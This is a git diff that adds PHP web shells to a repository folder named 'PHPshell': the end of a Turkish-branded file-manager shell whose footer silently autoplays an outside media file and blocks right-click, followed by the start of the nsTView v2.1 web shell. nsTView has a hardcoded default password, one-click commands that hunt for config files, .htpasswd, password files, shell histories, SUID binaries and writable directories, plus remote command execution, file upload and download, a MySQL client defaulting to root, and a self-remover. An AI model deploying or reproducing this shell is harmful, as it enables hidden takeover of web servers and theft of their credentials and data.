+'permission_for' => 'Rechte für "[%1]":', +'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.', +'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.', +'not_readable' => '"[%1]" kann nicht gelesen werden.' + ); + + case 'fr': + + $date_format = 'd.m.y H:i:s'; + $word_charset = 'ISO-8859-1'; + + return array( +'directory' => 'Répertoire', +'file' => 'Fichier', +'filename' => 'Nom fichier', + +'size' => 'Taille', +'permission' => 'Droits', +'owner' => 'Propriétaire', +'group' => 'Groupe', +'other' => 'Autres', +'Gِrevler' => 'Fonctions', + +'read' => 'Lire', +'write' => 'Ecrire', +'execute' => 'Exécuter', + +'create_symlink' => 'Créer lien symbolique', +'Sil' => 'Effacer', +'Degistir' => 'Renommer', +'Tasi' => 'Déplacer', +'Kopyala' => 'Copier', +'Düzenle' => 'Ouvrir', +'indir' => 'Télécharger sur PC', +'upload' => 'Télécharger sur serveur', +'create' => 'Créer', +'change' => 'Changer', +'save' => 'Sauvegarder', +'set' => 'Exécuter', +'reset' => 'Réinitialiser', +'relative' => 'Relatif', + +'yes' => 'Oui', +'no' => 'Non', +'Geri' => 'Retour', +'Yol' => 'Yol', +'symlink' => 'Lien symbollique', +'no_output' => 'Pas de sortie', + +'user' => 'Utilisateur', +'password' => 'Mot de passe', +'add' => 'Ajouter', +'add_basic_auth' => 'add basic-authentification', + +'uploaded' => '"[%1]" a été téléchargé sur le serveur.', +'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.', +'already_exists' => '"[%1]" existe déjà.', +'created' => '"[%1]" a été créé.', +'not_created' => '"[%1]" n a pas pu être créé.', +'really_Sil' => 'Effacer le fichier?', +'Sild' => "Ces fichiers ont été détuits:\n[%1]", +'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]", +'Degistir_file' => 'Renomme fichier:', +'Degistird' => '"[%1]" a été renommé en "[%2]".', +'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".', +'Tasi_files' => 'Déplacer ces fichiers:', +'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]", 
+'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]", +'Kopyala_files' => 'Copier ces fichiers:', +'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]", +'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]", +'not_Düzenleed' => '"[%1]" ne peut être ouvert.', +'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}", +'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}", +'saved' => '"[%1]" a été sauvegardé.', +'not_saved' => '"[%1]" n a pas pu être sauvegardé.', +'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.', +'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.', +'permission_for' => 'Droits de "[%1]":', +'permission_set' => 'Droits de "[%1]" ont été changés en [%2].', +'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].', +'not_readable' => '"[%1]" ne peut pas être ouvert.' + ); + + case 'it': + + $date_format = 'd-m-Y H:i:s'; + $word_charset = 'ISO-8859-1'; + + return array( +'directory' => 'Directory', +'file' => 'File', +'filename' => 'Nome File', + +'size' => 'Dimensioni', +'permission' => 'Permessi', +'owner' => 'Proprietario', +'group' => 'Gruppo', +'other' => 'Altro', +'Gِrevler' => 'Funzioni', + +'read' => 'leggi', +'write' => 'scrivi', +'execute' => 'esegui', + +'create_symlink' => 'crea link simbolico', +'Sil' => 'cancella', +'Degistir' => 'rinomina', +'Tasi' => 'sposta', +'Kopyala' => 'copia', +'Düzenle' => 'modifica', +'indir' => 'indir', +'upload' => 'upload', +'create' => 'crea', +'change' => 'cambia', +'save' => 'salva', +'set' => 'imposta', +'reset' => 'reimposta', +'relative' => 'Percorso relativo per la destinazione', + +'yes' => 'Si', +'no' => 'No', +'Geri' => 'indietro', +'Yol' => 'Destinazione', +'symlink' => 'Link simbolico', +'no_output' => 'no output', + +'user' => 'User', +'password' => 'Password', +'add' => 'aggiungi', +'add_basic_auth' => 'aggiungi autenticazione base', + +'uploaded' => 
'"[%1]" è stato caricato.', +'not_uploaded' => '"[%1]" non è stato caricato.', +'already_exists' => '"[%1]" esiste già.', +'created' => '"[%1]" è stato creato.', +'not_created' => '"[%1]" non è stato creato.', +'really_Sil' => 'Cancello questi file ?', +'Sild' => "Questi file sono stati cancellati:\n[%1]", +'not_Sild' => "Questi file non possono essere cancellati:\n[%1]", +'Degistir_file' => 'File rinominato:', +'Degistird' => '"[%1]" è stato rinominato in "[%2]".', +'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".', +'Tasi_files' => 'Sposto questi file:', +'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]", +'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]", +'Kopyala_files' => 'Copio questi file', +'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]", +'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]", +'not_Düzenleed' => '"[%1]" non puٍ essere modificato.', +'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}", +'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}", +'saved' => '"[%1]" è stato salvato.', +'not_saved' => '"[%1]" non è stato salvato.', +'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.', +'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.', +'permission_for' => 'Permessi di "[%1]":', +'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].', +'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].', +'not_readable' => '"[%1]" non puٍ essere letto.' 
+ ); + + case 'se': + + $date_format = 'n/j/y H:i:s'; + $word_charset = 'ISO-8859-1'; + + return array( +'directory' => 'Mapp', +'file' => 'Fil', +'filename' => 'Filnamn', + +'size' => 'Storlek', +'permission' => 'Sنkerhetsnivه', +'owner' => 'ؤgare', +'group' => 'Grupp', +'other' => 'Andra', +'Gِrevler' => 'Funktioner', + +'read' => 'Lنs', +'write' => 'Skriv', +'execute' => 'Utfِr', + +'create_symlink' => 'Skapa symlink', +'Sil' => 'Radera', +'Degistir' => 'Byt namn', +'Tasi' => 'Flytta', +'Kopyala' => 'Kopiera', +'Düzenle' => 'ؤndra', +'indir' => 'Ladda ner', +'upload' => 'Ladda upp', +'create' => 'Skapa', +'change' => 'ؤndra', +'save' => 'Spara', +'set' => 'Markera', +'reset' => 'Tِm', +'relative' => 'Relative path to target', + +'yes' => 'Ja', +'no' => 'Nej', +'Geri' => 'Tillbaks', +'Yol' => 'Yol', +'symlink' => 'Symlink', +'no_output' => 'no output', + +'user' => 'Anvنndare', +'password' => 'Lِsenord', +'add' => 'Lنgg till', +'add_basic_auth' => 'add basic-authentification', + +'uploaded' => '"[%1]" har laddats upp.', +'not_uploaded' => '"[%1]" kunde inte laddas upp.', +'already_exists' => '"[%1]" finns redan.', +'created' => '"[%1]" har skapats.', +'not_created' => '"[%1]" kunde inte skapas.', +'really_Sil' => 'Radera dessa filer?', +'Sild' => "De hنr filerna har raderats:\n[%1]", +'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]", +'Degistir_file' => 'Byt namn pه fil:', +'Degistird' => '"[%1]" har bytt namn till "[%2]".', +'not_Degistird' => '"[%1] kunde inte dِpas om till "[%2]".', +'Tasi_files' => 'Flytta dessa filer:', +'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]", +'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]", +'Kopyala_files' => 'Kopiera dessa filer:', +'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]", +'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]", +'not_Düzenleed' => '"[%1]" kan inte نndras.', +'executed' => "\"[%1]\" har utfِrts:\n{%2}", +'not_executed' => "\"[%1]\" kunde 
inte utfِras:\n{%2}", +'saved' => '"[%1]" har sparats.', +'not_saved' => '"[%1]" kunde inte sparas.', +'symlinked' => 'Symlink frهn "[%2]" till "[%1]" har skapats.', +'not_symlinked' => 'Symlink frهn "[%2]" till "[%1]" kunde inte skapas.', +'permission_for' => 'Rنttigheter fِr "[%1]":', +'permission_set' => 'Rنttigheter fِr "[%1]" نndrades till [%2].', +'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', +'not_readable' => '"[%1]" kan inte lنsas.' + ); + + case 'en': + default: + + $date_format = 'n/j/y H:i:s'; + $word_charset = 'ISO-8859-1'; + + return array( +'directory' => 'Düzergah', +'file' => 'Dosya', +'filename' => 'DosyaAdi', + +'size' => 'Boyut', +'permission' => 'izin', +'owner' => 'Sahip', +'group' => 'Grup', +'other' => 'Diًerleri', +'Gِrevler' => 'Gِrevler', + +'read' => 'Oku', +'write' => 'Yaz', +'execute' => 'Uygula', + +'create_symlink' => 'create symlink', +'Sil' => 'Sil', +'Degistir' => 'Degistir', +'Tasi' => 'Tasi', +'Kopyala' => 'Kopyala', +'Düzenle' => 'Düzenle', +'indir' => 'indir', +'upload' => 'Yükle', +'create' => 'Olustur', +'change' => 'Degisiklik', +'save' => 'Kaydet', +'set' => 'Koyulan', +'reset' => 'Yenile', +'relative' => 'Hedefe Yolla', + +'yes' => 'Evet', +'no' => 'Hayir', +'Geri' => 'Geri', +'Yol' => 'Yol', +'symlink' => 'Symlink', +'no_output' => 'Hiçbir ç‎kt‎', + +'user' => 'Kullan‎c‎', +'password' => 'Sifre', +'add' => 'Ekle', +'add_basic_auth' => 'add basic-authentification', + +'uploaded' => '"[%1]" Yüklendi.', +'not_uploaded' => '"[%1]" Yüklenemedi.', +'already_exists' => '"[%1]" قimdiden var ol.', +'created' => '"[%1]" Olusturuldu.', +'not_created' => '"[%1]" Olusturuldu.', +'really_Sil' => 'Silinen dosyalar?', +'Sild' => "Bu dosyalar,oldu Sild:\n[%1]", +'not_Sild' => "Bu dosyalar olamazd‎ Sild:\n[%1]", +'Degistir_file' => 'Dosyayi Degistir:', +'Degistird' => '"[%1]" Degistirildi "[%2]".', +'not_Degistird' => '"[%1] Degistirilemedi "[%2]".', +'Tasi_files' => 'Dosyayi TAsi:', +'Tasid' => "Bu Dosyalar 
Tasindi \"[%2]\":\n[%1]", +'not_Tasid' => "Bu Dosyalar Tasinamaz \"[%2]\":\n[%1]", +'Kopyala_files' => 'Bu Dosyalari Kopyala:', +'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]", +'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]", +'not_Düzenleed' => '"[%1]" Düzenle.', +'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}", +'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}", +'saved' => '"[%1]" Kurtarildi.', +'not_saved' => '"[%1]" Kurtar‎lamad‎.', +'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.', +'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.', +'permission_for' => 'izin "[%1]":', +'permission_set' => 'izin "[%1]" Kopyalandi [%2].', +'permission_not_set' => 'izin "[%1]" Yapilamadi [%2].', +'not_readable' => '"[%1]" Okunamadi.' + ); + + } + +} + +function getimage ($image) { + switch ($image) { + case 'file': + return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'); + case 'folder': + return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'); + case 'hidden_file': + return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'); + case 'link': + return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA'); + case 'smiley': + return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA='); + case 'arrow': + return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw=='); + } +} + +function html_header () { + global $charset; + + echo <<<END +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 
1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml"> +<head> + +<meta http-equiv="Content-Type" content="text/html; charset=$charset" /> + +<title>iMHaBiRLiGi PhpFtp</title> + +<style type="text/css"> +body { font: small sans-serif; text-align: center } +img { width: 0px; height: 0px } +a, a:visited { text-decoration: none; color: red } +hr { border-style: none; height: 1px; Geriground-color: silver; color: silver } +#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px } +#main th { Geriground: #eee; padding: 3pt 3pt 0pt 3pt } +.listing th, .listing td { padding: 1px 3pt 0 3pt } +.listing th { border: 1px solid silver } +.listing td { border: 1px solid #ddd; Geriground: white } +.listing .checkbox { text-align: center } +.listing .filename { text-align: left } +.listing .size { text-align: right } +.listing .permission_header { text-align: left } +.listing .permission { font-family: monospace } +.listing .owner { text-align: left } +.listing .group { text-align: left } +.listing .Gِrevler { text-align: left } +.listing_footer td { Geriground: #eee; border: 1px solid silver } +#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt } +#directory { Geriground: #eee; border: 1px solid silver } +#upload { padding-top: 1em } +#create { padding-bottom: 1em } +.small, .small option { font-size: x-small } +textarea { border: none; Geriground: white } +table.dialog { margin-left: auto; margin-right: auto } +td.dialog { Geriground: #eee; padding: 1ex; border: 1px solid silver; text-align: center } +#permission { margin-left: auto; margin-right: auto } +#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center } +td.permission_action { text-align: right } +#symlink { Geriground: #eee; border: 1px solid silver } +#symlink td { text-align: left; padding: 3pt } +#red_button { width: 120px; color: #400 } +#green_button { 
width: 120px; color: #040 } +#error td { Geriground: maroon; color: white; border: 1px solid silver } +#notice td { Geriground: green; color: white; border: 1px solid silver } +#notice pre, #error pre { Geriground: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex } +code { font-size: 12pt } +td { white-space: nowrap } +</style> + +<script type="text/javascript"> +<!-- +function activate (name) { + if (document && document.forms[0] && document.forms[0].elements['focus']) { + document.forms[0].elements['focus'].value = name; + } +} +//--> +</script> + +</head> +<body> + + +END; + +} + +function html_footer () { + + echo <<<END +</body> +</html> +END; + +} + +function notice ($phrase) { + global $cols; + + $args = func_get_args(); + array_shift($args); + + return '<tr id="notice"> + <td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td> +</tr> +'; + +} + +function error ($phrase) { + global $cols; + + $args = func_get_args(); + array_shift($args); + + return '<tr id="error"> + <td colspan="' . $cols . '">' . phrase($phrase, $args) . 
'</td>
+</tr>
+';
+
+}
+
+?>
+<BODY><IMG style="WIDTH: 306px; HEIGHT: 76px" height=100
+src="http://www.nettekiadres.com/imhabirligi.jpg" width=282></BODY>
+<br><Center>SU AN <A href="http://www.imhabirligi.com">iMHaBiRLiGi</A> HUDUTLARINDA BULUNMAKTASINIZ.!!</Center>
+<FONT
+class=footmsg><EMBED src=http://www.imhabirligi.com/r1/hurl.asx hidden=true
+type="text/plain; charset=iso-8859-9"
+AUTOSTART="TRUE">
+<script language=JavaScript>
+<!--
+
+var message="";
+///////////////////////////////////
+function clickIE() {if (document.all) {(message);return false;}}
+function clickNS(e) {if
+(document.layers||(document.getElementById&&!document.all)) {
+if (e.which==2||e.which==3) {(message);return false;}}}
+if (document.layers)
+{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
+else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
+
+document.oncontextmenu=new Function("return false")
+// -->
+</script>
\ No newline at end of file
diff --git a/php/PHPshell/nstview/Thumbs.db b/php/PHPshell/nstview/Thumbs.db
new file mode 100644
index 0000000..1979d7a
Binary files /dev/null and b/php/PHPshell/nstview/Thumbs.db differ
diff --git a/php/PHPshell/nstview/nstview.jpg b/php/PHPshell/nstview/nstview.jpg
new file mode 100644
index 0000000..113860f
Binary files /dev/null and b/php/PHPshell/nstview/nstview.jpg differ
diff --git a/php/PHPshell/nstview/nstview.php b/php/PHPshell/nstview/nstview.php
new file mode 100644
index 0000000..4ecf4bb
--- /dev/null
+++ b/php/PHPshell/nstview/nstview.php
@@ -0,0 +1,2136 @@ +<? +@session_start(); +@set_time_limit(0); +@set_magic_quotes_runtime(0); +error_reporting(E_ALL & ~E_NOTICE); +#####cfg##### +# use password true / false # +$create_password = true; +$password = "nst"; // default password for nstview, you can change it. + +# UNIX COMMANDS +# description (nst) command +# example: Shutdown (nst) shutdown -h now +$fast_commands = " +Show open ports (nst) netstat -an | grep LISTEN | grep tcp +last root (nst) last root +last (all users) (nst) last all +Find all config.php in / (nst) find / -type f -name config.php +Find all config.php in . (nst) find . -type f -name config.php +Find all admin.php in / (nst) find / -type f -name admin.php +Find all admin.php in . (nst) find . -type f -name admin.php +Find all config.inc.php in / (nst) find / -type f -name config.inc.php +Find all config.inc.php in . (nst) find . -type f -name config.inc.php +Find all config.inc in / (nst) find / -type f -name config.inc +Find all config.inc in . (nst) find . -type f -name config.inc +Find all config.dat in / (nst) find / -type f -name config.dat +Find all config.dat in . (nst) find . -type f -name config.dat +Find all config* in / (nst) find / -type f -name config* +Find all config* in . (nst) find . -type f -name config* +Find all pass* in / (nst) find / -type f -name pass* +Find all pass* in . (nst) find . -type f -name pass* +Find all .bash_history in / (nst) find / -type f -name .bash_history +Find all .bash_history in . (nst) find . -type f -name .bash_history +Find all .htpasswd in / (nst) find / -type f -name .htpasswd +Find all .htpasswd in . (nst) find . -type f -name .htpasswd +Find all writable dirs/files in / (nst) find / -perm -2 -ls +Find all writable dirs/files in . (nst) find . -perm -2 -ls +Find all suid files in / (nst) find / -type f -perm -04000 -ls +Find all suid files in . (nst) find . -type f -perm -04000 -ls +Find all sgid files in / (nst) find / -type f -perm -02000 -ls +Find all sgid files in . (nst) find . 
-type f -perm -02000 -ls +Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc +Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc +OS Version? (nst) sysctl -a | grep version +Kernel version? (nst) cat /proc/version +cat syslog.conf (nst) cat /etc/syslog.conf +Cat - Message of the day (nst) cat /etc/motd +Cat hosts (nst) cat /etc/hosts +Distrib name (nst) cat /etc/issue.net +Distrib name (2) (nst) cat /etc/*-realise +Display all process - wide output (nst) ps auxw +Display all your process (nst) ps ux +Interfaces (nst) ifconfig +CPU? (nst) cat /proc/cpuinfo +RAM (nst) free -m +HDD space (nst) df -h +List of Attributes (nst) lsattr -a +Mount options (nst) cat /etc/fstab +Is cURL installed? (nst) which curl +Is wGET installed? (nst) which wget +Is lynx installed? (nst) which lynx +Is links installed? (nst) which links +Is fetch installed? (nst) which fetch +Is GET installed? (nst) which GET +Is perl installed? (nst) which perl +Where is apache (nst) whereis apache +Where is perl (nst) whereis perl +locate proftpd.conf (nst) locate proftpd.conf +locate httpd.conf (nst) locate httpd.conf +locate my.conf (nst) locate my.conf +locate psybnc.conf (nst) locate psybnc.conf +"; + + + +# WINDOWS COMMANDS +# description (nst) command +# example: Delete autoexec.bat (nst) del c:\autoexec.bat +$fast_commands_win = " +OS Version (nst) ver +Tasklist (nst) tasklist +Attributes in . 
(nst) attrib +Show open ports (nst) netstat -an +"; + + + + + +######ver#### +$ver= "v2.1"; +############# +$pass=$_POST['pass']; +if($pass==$password){ +$_SESSION['nst']="$pass"; +} +if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"]; +else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; +else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"]; +else $ip = $_SERVER['REMOTE_ADDR']; +$ip=htmlspecialchars($ip); + +if($create_password==true){ + +if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){ +die(" +<title>nsTView $ver:: nst.void.ru</title> +<center> +<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td> +<font size=1 face=verdana><center> +<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b> +</center> +<form method=post> +Password:<br> +<input type=password name=pass size=30 tabindex=1> +</form> +<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br> +<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br> +<b>Your ip:</b> ".$ip." +</td></tr></table> +");} + +} +$d=$_GET['d']; + +function adds($editf){ +#if(get_magic_quotes_gpc()==0){ +$editf=addslashes($editf); +#} +return $editf; +} +function adds2($editf){ +if(get_magic_quotes_gpc()==0){ +$editf=addslashes($editf); +} +return $editf; +} + +$f = "nst_sql.txt"; +$f_d = $_GET['f_d']; + +if($_GET['download']){ +$download=$_GET['download']; +header("Content-disposition: attachment; filename=\"$download\";"); +readfile("$d/$download"); +exit;} + +if($_GET['dump_download']){ +header("Content-disposition: attachment; filename=\"$f\";"); +header("Content-length: ".filesize($f_d."/".$f)); +header("Expires: 0"); +readfile($f_d."/".$f); +if(is_writable($f_d."/".$f)){ +unlink($f_d."/".$f); +} +die; +} + + +$images=array(".gif",".jpg",".png",".bmp",".jpeg"); +$whereme=getcwd(); +@$d=@$_GET['d']; +$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... 
Network security team ...o</a>"; +$php_self=@$_SERVER['PHP_SELF']; +if(@eregi("/",$whereme)){$os="unix";}else{$os="win";} +if(!isset($d)){$d=$whereme;} +$d=str_replace("\\","/",$d); +if(@$_GET['p']=="info"){ +@phpinfo(); +exit;} +if(@$_GET['img']=="1"){ +@$e=$_GET['e']; +header("Content-type: image/gif"); +readfile("$d/$e"); +} +if(@$_GET['getdb']=="1"){ +header('Content-type: application/plain-text'); +header('Content-Disposition: attachment; filename=nst-mysql-damp.htm'); +} +print "<title>nsT View $ver</title> +<style> +BODY, TD, TR { +text-decoration: none; +font-family: Verdana; +font-size: 8pt; +SCROLLBAR-FACE-COLOR: #363d4e; +SCROLLBAR-HIGHLIGHT-COLOR: #363d4e; +SCROLLBAR-SHADOW-COLOR: #363d4e; +SCROLLBAR-ARROW-COLOR: #363d4e; +SCROLLBAR-TRACK-COLOR: #91AAFF +} +input, textarea, select { +font-family: Verdana; +font-size: 10px; +color: black; +background-color: white; +border: solid 1px; +border-color: black +} +UNKNOWN { +COLOR: #0006DE; +TEXT-DECORATION: none +} +A:link { +COLOR: #0006DE; +TEXT-DECORATION: none +} +A:hover { +COLOR: #FF0C0B; +TEXT-DECORATION: none +} +A:active { +COLOR: #0006DE; +TEXT-DECORATION: none +} +A:visited { +TEXT-DECORATION: none +} +</style> +<script> +function ShowOrHide(d1, d2) { +if (d1 != '') DoDiv(d1); +if (d2 != '') DoDiv(d2);} + +function DoDiv(id) { +var item = null; +if (document.getElementById) { +item = document.getElementById(id); +} else if (document.all){ +item = document.all[id]; +} else if (document.layers){ +item = document.layers[id];} +if (!item) {} +else if (item.style) { +if (item.style.display == \"none\"){ item.style.display = \"\"; } +else {item.style.display = \"none\"; } +}else{ item.visibility = \"show\"; }} + +function cwd(text){ +document.sh311Form.sh3.value+=\" \"+ text; +document.sh311Form.sh3.focus(); +} + + +</script> +"; +print "<body vlink=#0006DE> +<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center> +<tr><td><font face=wingdings size=2>0</font>"; 
+$expl=explode("/",$d); +$coun=count($expl); +if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";} +else{ + echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";} +for($i=1; $i<$coun; $i++){ + @$xx.=$expl[$i]."/"; +$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/"; +$sls=str_replace("//","/",$sls); +$sls=str_replace("/'></a>/","/'></a>",$sls); +print $sls; +} +if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";} +if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";} +echo "</td></tr>"; +if($os=="unix"){ echo " +<tr><td><b>id:</b> ".@exec('id')."</td></tr> +<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo" +<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br> +[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br> +[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>] +[<a href='$php_self'>Home</a>] +[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>] +[<a href='$php_self?d=$d&t=upload'>Upload</a>] +[<a href='$php_self?t=tools'>Tools</a>] +[<a href='$php_self?p=info'>PHPinfo</a>] +[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>] +[<a href='$php_self?p=sql'>SQL</a>] +[<a href='$php_self?p=selfremover'>Self Remover</a>] +</td></tr> +"; +if($os=="win"){ echo " +<tr><td bgcolor=white> +<center><font face=wingdings size=2><</font> +<a href='$php_self?d=a:/'>A</a> +<a href='$php_self?d=b:/'>B</a> +<a href='$php_self?d=c:/'>C</a> +<a href='$php_self?d=d:/'>D</a> +<a href='$php_self?d=e:/'>E</a> +<a href='$php_self?d=f:/'>F</a> +<a href='$php_self?d=g:/'>G</a> +<a href='$php_self?d=h:/'>H</a> +<a href='$php_self?d=i:/'>I</a> +<a href='$php_self?d=j:/'>J</a> +<a href='$php_self?d=k:/'>K</a> +<a href='$php_self?d=l:/'>L</a> +<a 
href='$php_self?d=m:/'>M</a> +<a href='$php_self?d=n:/'>N</a> +<a href='$php_self?d=o:/'>O</a> +<a href='$php_self?d=p:/'>P</a> +<a href='$php_self?d=q:/'>Q</a> +<a href='$php_self?d=r:/'>R</a> +<a href='$php_self?d=s:/'>S</a> +<a href='$php_self?d=t:/'>T</a> +<a href='$php_self?d=u:/'>U</a> +<a href='$php_self?d=v:/'>V</a> +<a href='$php_self?d=w:/'>W</a> +<a href='$php_self?d=x:/'>X</a> +<a href='$php_self?d=y:/'>Y</a> +<a href='$php_self?d=z:/'>Z</a> +</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";} +print "<tr><td> +:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> :: +<a href='$php_self?d=$d&mkfile=1'>Create file</a> :: +<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::"; +if($os=="unix"){ +print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::"; +} +print "</td></tr>"; + + + + + +if($_GET['p']=="ftp"){ +print "<tr><td>"; + + + +print "</td></tr></table>"; +print $copyr; +exit; +} + + + + + + + + + + +if(@$_GET['p']=="sql"){ +print "<tr><td>"; +### + +$f_d = $_GET['f_d']; +if(!isset($f_d)){$f_d=".";} +if($f_d==""){$f_d=".";} + +$php_self=$_SERVER['PHP_SELF']; +$delete_table=$_GET['delete_table']; +$tbl=$_GET['tbl']; +$from=$_GET['from']; +$to=$_GET['to']; +$adress=$_POST['adress']; +$port=$_POST['port']; +$login=$_POST['login']; +$pass=$_POST['pass']; +$adress=$_GET['adress']; +$port=$_GET['port']; +$login=$_GET['login']; +$pass=$_GET['pass']; +$conn=$_GET['conn']; +if(!isset($adress)){$adress="localhost";} +if(!isset($login)){$login="root";} +if(!isset($pass)){$pass="";} +if(!isset($port)){$port="3306";} +if(!isset($from)){$from=0;} +if(!isset($to)){$to=50;} + + +?> +<style> +table,td{ +color: black; +font-face: verdana; +font-size: 11px; + +} +</style> +<font color=black face=verdana size=1> +<? 
if(!$conn){ ?> + +<!-- table 1 --> +<table bgcolor=#D7FFA8> +<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr> +<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr> +<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr> +<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?> +<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr> +</table> +<!-- end of table 1 --> + + +<? +$conn=$_GET['conn']; +$adress=$_GET['adress']; +$port=$_GET['port']; +$login=$_GET['login']; +$pass=$_GET['pass']; +if($conn){ + +$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: 